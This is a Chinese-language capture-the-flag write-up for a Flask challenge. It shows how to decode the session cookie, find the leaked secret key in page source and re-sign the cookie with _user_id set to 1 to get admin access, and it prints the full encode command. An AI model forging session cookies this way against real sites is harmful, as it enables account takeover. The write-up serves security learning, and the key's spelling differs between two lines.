[NSSRound#13 Basic]flask?jwt?
注册账号随便输
登录
点击“拿flag”
分析题目
百度关键词 flask jwt cookie
抓取cookie·
后续步骤,所需工具地址:GitHub - noraj/flask-session-cookie-manager: :cookie: Flask Session Cookie Decoder/Encoder
可以看到我们的“id”是“2”,推测,再次创建用户解析是“3”,实践如下:
获取cookie解密(注意下图的用户)
和我们的推断一致,盲猜第一个就是admin
修改id为“1”,这里需要修改符号和一下细节
原:'{"_fresh":true,"_id":"5565b9c5173058e2a7b08973e9f708c0bef1c4005e0a4fffb3460c0a95079b00ecb2b9c405114006f0ea05d58b7344c0b06c97e0d6e7fb8e5b652bddaaf2055a","_user_id":"3"}'
修改符号:"{'_fresh':True, '_id': '5565b9c5173058e2a7b08973e9f708c0bef1c4005e0a4fffb3460c0a95079b00ecb2b9c405114006f0ea05d58b7344c0b06c97e0d6e7fb8e5b652bddaaf2055a', '_user_id': '1'}"
修改”和‘,给true首字母大写,给一些地方加上空格不然脚本会报错
显然是没用的功能,但是还是设计出来了,可能有提示
上帝之眼-F12,找到key:th3f1askisfunny
报错如下:
正确方式:
命令:python flask_session_cookie_manager3.py encode -s "th3flaskisfunny" -t "{'_fresh': True, '_id': '5565b9c5173058e2a7b08973e9f708c0bef1c4005e0a4fffb3460c0a95079b00ecb2b9c405114006f0ea05d58b7344c0b06c97e0d6e7fb8e5b652bddaaf2055a', '_user_id': '1'}"
拿到cookie,去替换(成功如下图)
这里我写文章的时候环境关闭了,我又重现创建了一个用户,所以cookie变了!!!
成功之后,点击“拿flag”,然后替换cookie
拿到